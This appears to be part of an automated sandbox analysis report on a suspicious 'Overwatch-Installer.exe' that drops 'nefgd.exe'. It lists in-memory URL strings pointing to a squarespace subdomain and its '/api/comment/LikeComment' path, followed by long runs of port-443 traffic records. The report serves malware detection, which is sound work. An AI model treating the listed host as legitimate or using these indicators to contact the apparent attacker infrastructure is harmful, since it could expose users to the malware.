Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdV
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdVS
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdVh
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdVp
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdZ
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdZt
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdb
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdb5
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdbH
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdbQ
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdbe
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdbu
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdf
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdf3
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdfO
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdfb
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdfi
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdfw
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdf~
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdj
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdj%
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdj6
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdn
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdn=
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdnF
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdnZ
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdr
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdr(
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdrD
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdrW
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdrl
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdrs
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdrz
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdv
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdv/
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdv5
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdvP
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdvS
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdvx
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdz
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdz;
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdzE
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdzO
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdzj
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~9
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~L
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~S
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~U
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~a
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~i
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~y
Source: nefgd.exe, 00000003.00000002.4464189616.0000000003631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespace.com
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000405A000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.00000000040A4000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003C32000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000402D000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000403C000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003C7B000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000004057000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000409F000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000404E000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000403F000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000004076000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000406F000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000406B000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000004060000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000400C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespace.com$
Source: Overwatch-Installer.exe, nefgd.exe.0.dr	String found in binary or memory: https://plantain-elk-b8pt.squarespace.com/api/comment/LikeComment
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespace.com7

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 50359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 50382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 50347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 50335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 50369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50337
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50339
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50338
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50330
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50333
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50334
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50349
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50342
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 50339 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50344
Source: unknown	Network traffic detected: HTTP traffic on port 50352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50345
Source: unknown	Network traffic detected: HTTP traffic on port 50289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
